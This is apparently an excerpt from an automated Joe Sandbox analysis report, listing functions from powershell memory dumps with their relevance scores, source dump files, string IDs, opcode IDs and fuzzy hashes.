                    • Instruction ID: 8ca3943609ef9d9db08369ad9094e67e4c6301b5bbddc2df150fb133255310ed
                    • Opcode Fuzzy Hash: 58ce1b25595f5d8a7d8fb3f223a4778580497f4d43c0e7da7ce7792a8402e4af
                    • Instruction Fuzzy Hash: 5FB1AD34E00204DFDB58CBA8C541BAEBBB3AF88344F19C459D5156F396CB76E846CBA1
                    Function 06FD1E3B Relevance: 3.9, Strings: 3, Instructions: 133COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q
                    • API String ID: 0-1444653880
                    • Opcode ID: d981f2239ee73a8c2fb1ade475e47b32c1c46e3003745ebfbafdc94d43ee1f97
                    • Instruction ID: db6ccb2114e447e77a964b35909ff94b41a1903141e95a73f1eaf746e0f862f4
                    • Opcode Fuzzy Hash: d981f2239ee73a8c2fb1ade475e47b32c1c46e3003745ebfbafdc94d43ee1f97
                    • Instruction Fuzzy Hash: C141C032F042148FC765D7B884016AABFE39F85311B1884BBD945DB252DB35ED02C7E2
                    Function 06FD1D28 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q
                    • API String ID: 0-182748909
                    • Opcode ID: 1239984b51c199e87e90065ecc51206751fb49d77fc9bc06659d797ba2071201
                    • Instruction ID: b0ad5e51c8fa1345d8a9eb29ccb4fd5e6617a663a2163b3959fc809c41bd84d1
                    • Opcode Fuzzy Hash: 1239984b51c199e87e90065ecc51206751fb49d77fc9bc06659d797ba2071201
                    • Instruction Fuzzy Hash: D6313C32B04205CFE765DA59D840967BBBBEFC1224B2CC56BE8558F291DF32E806C761
                    Function 06FD64C8 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: a3f68aa6fa0b62746a4dd857fc6191ae49ab895e081193dac4d1e3f31eb3786d
                    • Instruction ID: 093b7ab5f02d96a51efb43d8c55e4fd0376345d98da5878babfca536bf41b1ac
                    • Opcode Fuzzy Hash: a3f68aa6fa0b62746a4dd857fc6191ae49ab895e081193dac4d1e3f31eb3786d
                    • Instruction Fuzzy Hash: 8B724C34E003088FDB94DB98C555A6ABBB3EF85304F25C469D9099F396CB72EC42CB91
                    Function 06FD7B83 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 951fa6479bd4f3f22dce18414893b38c7c73b085b344664e85376055540f38fa
                    • Instruction ID: 09febfd31e41207337e08e1d0be3aac9ac1aa41a482371308db46e815e56e0f2
                    • Opcode Fuzzy Hash: 951fa6479bd4f3f22dce18414893b38c7c73b085b344664e85376055540f38fa
                    • Instruction Fuzzy Hash: CCF1D534B002149FDB24DB68C951BAEBBB3EF84340F148499D5196F396CB72ED85CBA1
                    Function 06FDB0C0 Relevance: 2.8, Strings: 2, Instructions: 320COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 33b484b7ddb6e8519b35cccb0be87bc7cdf00a1915eb9489065b66e0e91beff6
                    • Instruction ID: b780701cf06daacf265b0cfbc73b54108662622f6524ad121758ea867fe87980
                    • Opcode Fuzzy Hash: 33b484b7ddb6e8519b35cccb0be87bc7cdf00a1915eb9489065b66e0e91beff6
                    • Instruction Fuzzy Hash: 33A13672F04201CFDBA69FA8840267A7BE39FC5215F1A84BAC405DF251DF35E946C7A2
                    Function 06FD64AB Relevance: 1.9, Strings: 1, Instructions: 643COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q
                    • API String ID: 0-1259897404
                    • Opcode ID: 3d9b6b77447cfb3244290932f4b12a3c21faa28c132fcaed2c1989981e812ddf
                    • Instruction ID: 143f316dc50961f32263ef3be1a8a467a9739275861d8ea238aae71424e2951b
                    • Opcode Fuzzy Hash: 3d9b6b77447cfb3244290932f4b12a3c21faa28c132fcaed2c1989981e812ddf
                    • Instruction Fuzzy Hash: 34424D34E00214CFDB94CB98C545A5ABBB3EF89304F28D599E9099F396CB72EC42CB51
                    Function 06FD9894 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q
                    • API String ID: 0-1259897404
                    • Opcode ID: b785c370818887da2488e3a95f7f03964a916415699d8bb35d6080fc4090d46a
                    • Instruction ID: 2823d893f5a6dfd045e30aaf0a294bb20fc420b02a0c029b5e41752c285dad09
                    • Opcode Fuzzy Hash: b785c370818887da2488e3a95f7f03964a916415699d8bb35d6080fc4090d46a
                    • Instruction Fuzzy Hash: 73414631F04301CFCFA48FA48485B6A7BE3AF86344F1D84A5C8058B295DBB5E945C7A2
                    Function 06FD4515 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP]q
                    • API String ID: 0-2175968468
                    • Opcode ID: ca71623da2b266a833a5be0c96fd7930781de401963ad08e81a249ddc9fc2447
                    • Instruction ID: 2fb3c7bdf640e4145323409c9af9324e76e8f67c0ffecb19515559d9039d334c
                    • Opcode Fuzzy Hash: ca71623da2b266a833a5be0c96fd7930781de401963ad08e81a249ddc9fc2447
                    • Instruction Fuzzy Hash: 52410830E062949FC761CB58C954A5ABFF2AF86700F1DC49AD4459F252C631EC46CBA1
                    Function 06FD6DB1 Relevance: .5, Instructions: 459COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ad2cabc9fdaa7eeafdbc035be3dfc0d363b1d6099b8a3da9bd211636da12875
                    • Instruction ID: ab9b85127867b0a056ebc0c5763b729d4884506589cb01bc6e228fc1ac1565f1
                    • Opcode Fuzzy Hash: 9ad2cabc9fdaa7eeafdbc035be3dfc0d363b1d6099b8a3da9bd211636da12875
                    • Instruction Fuzzy Hash: 3F121F34E00204CFDB94CB98C555A6ABBB3EF85304F29D459E9099F396CB72ED42CB91
                    Function 04154EA8 Relevance: .3, Instructions: 335COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9600b2c188ef770325f256e1995a9ec4ad7e7501681fd63a5dfa69787888fa91
                    • Instruction ID: 19e776b7565348bce00a578114d332c933d84d29494c648950dab97a767b2f8e
                    • Opcode Fuzzy Hash: 9600b2c188ef770325f256e1995a9ec4ad7e7501681fd63a5dfa69787888fa91
                    • Instruction Fuzzy Hash: 84D10674A00208EFDB04DF98D584ADDBBB2FF88314F258599E815AB365D735ED82CB90
                    Function 04159580 Relevance: .3, Instructions: 324COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 492bd9578504404d0ef0b175ea6c1bb2fbc0ea7259e3f9019cf6e65d5dcf1016
                    • Instruction ID: fd8b22604a414d248147422b98259d88a5b2fef4481ed28bc620df39a859d80c
                    • Opcode Fuzzy Hash: 492bd9578504404d0ef0b175ea6c1bb2fbc0ea7259e3f9019cf6e65d5dcf1016
                    • Instruction Fuzzy Hash: BFC1DE71A10208DFCB14DFA5C884A9DBBB6FF84300F158599E816AF265CB74ED89CF81
                    Function 041545C0 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 802bddafe2569dbbfcc41ddb92a2cd8089dbf658669902c29da271119df14718
                    • Instruction ID: 132c7df0f4618908a91774585981ba0a16fff5e82d635f643725cdd921f9e7b2
                    • Opcode Fuzzy Hash: 802bddafe2569dbbfcc41ddb92a2cd8089dbf658669902c29da271119df14718
                    • Instruction Fuzzy Hash: 88D1F474A00219EFDB14CF98D584AEDBBB2FF88310F258599E855AB365C731ED81CB90
                    Function 0415F1E4 Relevance: .3, Instructions: 286COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f45f7ac69a907f24ebe895a30de1c8ff26b74cbe7d5ba22e50a02254b7c6b797
                    • Instruction ID: c34f7f36fe3914a723dcf4f3df31751c44dde31a58ff4f3e0f72b16134a1f5f5
                    • Opcode Fuzzy Hash: f45f7ac69a907f24ebe895a30de1c8ff26b74cbe7d5ba22e50a02254b7c6b797
                    • Instruction Fuzzy Hash: 3BB172B0E10209DFDF10CFA9D9C57DDBBF1AF88304F148569E825A7264EB74A846CB85
                    Function 06FD60C0 Relevance: .3, Instructions: 275COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ffd675f6d79d18197442e8ee44e7f9e85891c894c08bce58602a1f2348c43e3
                    • Instruction ID: 6235ef7fdee0c77656a394f3b51e717d2c19e3da72c67516deee1c79304a4cce
                    • Opcode Fuzzy Hash: 6ffd675f6d79d18197442e8ee44e7f9e85891c894c08bce58602a1f2348c43e3
                    • Instruction Fuzzy Hash: 79B17074E002049FDB54DBA8C555BAEBBB3EF89304F148564E805AF396CB76EC41CBA1
                    Function 0415FAB4 Relevance: .3, Instructions: 271COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d26149c2d50cc8e2cc6b9704d5827c100a10ffe19d896992f97c5d0f9093d861
                    • Instruction ID: 0715e28cf07b5ac8e0cc28edf8c8aa58366b8c7cc9ba4ff1252fbb9811637733
                    • Opcode Fuzzy Hash: d26149c2d50cc8e2cc6b9704d5827c100a10ffe19d896992f97c5d0f9093d861
                    • Instruction Fuzzy Hash: F0B17270E00209CFDB14CFA8C9D57DDBBF2AF48314F148529D829E7264EB74A846CB86
                    Function 06FD60BB Relevance: .2, Instructions: 241COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4facf3941c3265bb3ff9de431f99ca3015f371b0889ee525e2f0960550fe83b
                    • Instruction ID: 6db01c718127c94b123d3b87ddc483adb759e820600d1555b8157fd97e866573
                    • Opcode Fuzzy Hash: a4facf3941c3265bb3ff9de431f99ca3015f371b0889ee525e2f0960550fe83b
                    • Instruction Fuzzy Hash: 69918174E002049FDB54DB98C555BAEBBB3EF89304F148565E405AF392CB76EC41CBA1
                    Function 04152B48 Relevance: .2, Instructions: 229COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0668369f3cb99b16b3657683601f7e06e6feebabc046ecd658d7d9038e0bff25
                    • Instruction ID: 621869c7c7f67ac21b7e64207c61ed27eea222136ec8f3522d05bff81071457a
                    • Opcode Fuzzy Hash: 0668369f3cb99b16b3657683601f7e06e6feebabc046ecd658d7d9038e0bff25
                    • Instruction Fuzzy Hash: F7915675A00245CFCB05CF98C5D49EABBB1EF49310B25869AD865AB3A5C731FC91CBA0
                    Function 04158DE8 Relevance: .2, Instructions: 202COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b875f0b5b2328a8eb043e76169a80358f837b1e179b96ee71ca7581cfcfdf72
                    • Instruction ID: 8835c781e7919667983d399f73607f7945b9eefc1b0b2f25d38c8159453b5271
                    • Opcode Fuzzy Hash: 5b875f0b5b2328a8eb043e76169a80358f837b1e179b96ee71ca7581cfcfdf72
                    • Instruction Fuzzy Hash: C5819E30A01244DFCB15DFA8D8849ADBBF2FF89354F1584AAE8159B361D735EC85CB50
                    Function 06FD8990 Relevance: .2, Instructions: 192COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1184e4549826ff79f12ce656293574640d6c4c9bbc8d9ed6b11231a14a55e31a
                    • Instruction ID: 297c1fe154364b3136037fa1bf3e0ef8087d804e4806adbd1bdd8a67c58dc0cb
                    • Opcode Fuzzy Hash: 1184e4549826ff79f12ce656293574640d6c4c9bbc8d9ed6b11231a14a55e31a
                    • Instruction Fuzzy Hash: 80718E74E00204DFDB54DF98C591A6EBBB3EF88350F188469D815AB395DB32EC82CB91
                    Function 04159D48 Relevance: .2, Instructions: 189COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 757d468bde207cb7d726efad8b8baca78c96104a941063976549b99a77b1ff33
                    • Instruction ID: 81d1b914b9a4db5a37a919b110b83e7657b9084252b87eacede1ba2649c8de12
                    • Opcode Fuzzy Hash: 757d468bde207cb7d726efad8b8baca78c96104a941063976549b99a77b1ff33
                    • Instruction Fuzzy Hash: FC71AC30A00219CFCB14DF69D890AAEBBF2FF84354F14856AD419DB760DB75AC46CB80
                    Function 04159EB6 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03f1f8e4aba2c81570219148eec0501d29933e0386e7f37001d55ee0777cf8a7
                    • Instruction ID: 0ec43b465dc29a2db214601430248e4b90eb254a75e0d74c97ba3ea57a174428
                    • Opcode Fuzzy Hash: 03f1f8e4aba2c81570219148eec0501d29933e0386e7f37001d55ee0777cf8a7
                    • Instruction Fuzzy Hash: 0E715A70A10208DFCF14DFB5D590AADBBF6FF88348F148529D815AB2A0DB75AC86CB51
                    Function 06FD8970 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e7f99218688f133b422ab5830ebe9f19fb61a1706ff5bdebae759549edaa472
                    • Instruction ID: 605488c7a4249f2747477f2a306a27e7fe8550ba70ae3f14418d1a380255f73a
                    • Opcode Fuzzy Hash: 7e7f99218688f133b422ab5830ebe9f19fb61a1706ff5bdebae759549edaa472
                    • Instruction Fuzzy Hash: B1616D74E00204DFDB54CF58C491AAEBBB3EF49354F198499D8256B392DB32E882CB91
                    Function 04159D33 Relevance: .1, Instructions: 147COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a93ce7881b9f59c15237f766035fe708ade5aab9d7e6cf34eb6680da70807cd0
                    • Instruction ID: 42bc728605815778940a41eca0e728d70ac033810901bb2949a7e186392677a5
                    • Opcode Fuzzy Hash: a93ce7881b9f59c15237f766035fe708ade5aab9d7e6cf34eb6680da70807cd0
                    • Instruction Fuzzy Hash: D4519FB0A00209DFDB14DFA5C894BEEBBB6FF84304F148469D416AB3A4DBB4AC45CB51
                    Function 04159AD9 Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5fab8f1f0b43735623903ed86862e48c34b9d4e2dd1102bffa457abd8243615
                    • Instruction ID: 8e9eb1d9fabe1dbc2f2f14866a3e8361df9c8e1cf48138800e7db8502b8c9061
                    • Opcode Fuzzy Hash: c5fab8f1f0b43735623903ed86862e48c34b9d4e2dd1102bffa457abd8243615
                    • Instruction Fuzzy Hash: EE41B171A00208CFD714DB65C594AAD7BB2FF89354F0840A9D816EB7A4CF74AC41CB51
                    Function 04152C58 Relevance: .1, Instructions: 107COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7897ddccf59f385e1788e5e83b5307d9b885e53c1bc5770241fb40d8e2b81ff2
                    • Instruction ID: 9115efe1be898f8577f6c3148611eebb46b7dd91786e2afe1489f78c55b3b243
                    • Opcode Fuzzy Hash: 7897ddccf59f385e1788e5e83b5307d9b885e53c1bc5770241fb40d8e2b81ff2
                    • Instruction Fuzzy Hash: A641E275A00505DFCB09CF99C5D4AEABBB1FF48310B258599D855AB2A4C736FC90CFA0
                    Function 06FD9076 Relevance: .1, Instructions: 102COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37b0b5ff84acc153fa51b13f5a20496d3a71b0d4e8da959eb8078f7fdb4ad9f8
                    • Instruction ID: dc214ff62c0d59cce6ac4874862344fe7ce15dad26c1437934d54c9271767890
                    • Opcode Fuzzy Hash: 37b0b5ff84acc153fa51b13f5a20496d3a71b0d4e8da959eb8078f7fdb4ad9f8
                    • Instruction Fuzzy Hash: 55318434B40214AFDB0497B4C955BAE7A67EF84344F148818E9056F396CE77AC468BA1
                    Function 06FDB0A4 Relevance: .1, Instructions: 95COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cee4c5b75c7dcb1b7c1081897a2804c4868de73fc7db40fbb2b1127cde8f6914
                    • Instruction ID: 4bc9beaf4cf4642c1401ef80e8a6483683117b23c545f66cf6c8a7dce969e0dd
                    • Opcode Fuzzy Hash: cee4c5b75c7dcb1b7c1081897a2804c4868de73fc7db40fbb2b1127cde8f6914
                    • Instruction Fuzzy Hash: 00316CB6F042008FDBA64F648841B7D3BA39F91259B0F4595D9019F291CB36ED42C3B2
                    Function 0415C7B8 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7cdcf934e5600b292b4143a6f007b20c1a964519226b89cce16a6aaa466cb0a6
                    • Instruction ID: 1438a18a28bfdb29eb66ec711881356ed4a310ef78f2f8293eac1974720c1d08
                    • Opcode Fuzzy Hash: 7cdcf934e5600b292b4143a6f007b20c1a964519226b89cce16a6aaa466cb0a6
                    • Instruction Fuzzy Hash: 9E31FC34A00218CFCB25DB64C8946EEB7B2BF49345F1544E9D919AB361EF35AE81CF81
                    Function 041539D8 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed6a7b511d53ac67ac1ef8c77ebca6d1e1945cf06fb5ca6971594e2a2941ef4e
                    • Instruction ID: 14341fe2c9fc762d6c4d63ed8c891aad853581d27e6c9dbe68d7f437cf0a9e6b
                    • Opcode Fuzzy Hash: ed6a7b511d53ac67ac1ef8c77ebca6d1e1945cf06fb5ca6971594e2a2941ef4e
                    • Instruction Fuzzy Hash: 67319E74E05249DFCB01CF6CD8909AABBB4EF89340B15809AD829DB362D334EC45CBA1
                    Function 041545B0 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a82a3d9d4f067852edcd55216ea46220de63c0682ce3cfd646853053a714522
                    • Instruction ID: ecea53fbb88f239bae4af9891b1ee8b511e3aa1b809dbb4ea2f99878c22893a8
                    • Opcode Fuzzy Hash: 7a82a3d9d4f067852edcd55216ea46220de63c0682ce3cfd646853053a714522
                    • Instruction Fuzzy Hash: 1F21F674A00219DFCB04CF49C990AAAFBB1FF49310B158599E909AB761C735EC81CFA0
                    Function 041539C8 Relevance: .1, Instructions: 58COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d94ed4fcd5d6478ce2f9d241a8bf07510d7350d197d514fa51dfef9f633d4b30
                    • Instruction ID: 2e495708d1d4c8c0ef0fd188512ae2dbd4171b38becbc84412f92eeed3f794b5
                    • Opcode Fuzzy Hash: d94ed4fcd5d6478ce2f9d241a8bf07510d7350d197d514fa51dfef9f633d4b30
                    • Instruction Fuzzy Hash: 352117B4A042099FCB04DF98D9909AEBBB5FF89310B158599E819EB361C735FC41CBA1
                    Function 03FBD01D Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6606aac7c8489bd1863354fde53b1d4f3c92e777f85a0a4dfb79809ef4555cc5
                    • Instruction ID: 2c5f4d8f6dd01f647c2e25a4cd7ab16b8bff411fd5d0ec68a1c5199a5a320fed
                    • Opcode Fuzzy Hash: 6606aac7c8489bd1863354fde53b1d4f3c92e777f85a0a4dfb79809ef4555cc5
                    • Instruction Fuzzy Hash: 5501A7B14053459AD720CE16CD84BA7FFACEF463A4F1CC46AFD490A25AC2799841CAB2
                    Function 03FBD005 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a77886007bbe058f2bdfbad756120f1dae734783e883cd1c7ff3c20256516ebd
                    • Instruction ID: e3815375f584921bf3a78940456ad75d6998dfe3a71469e9a448a07b07053f69
                    • Opcode Fuzzy Hash: a77886007bbe058f2bdfbad756120f1dae734783e883cd1c7ff3c20256516ebd
                    • Instruction Fuzzy Hash: 8201447140E3C09ED7128B25C894752BFB4DF47224F1D84DBE9888F1A7C2695845C772

                    Non-executed Functions

                    Function 03FBD7B8 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
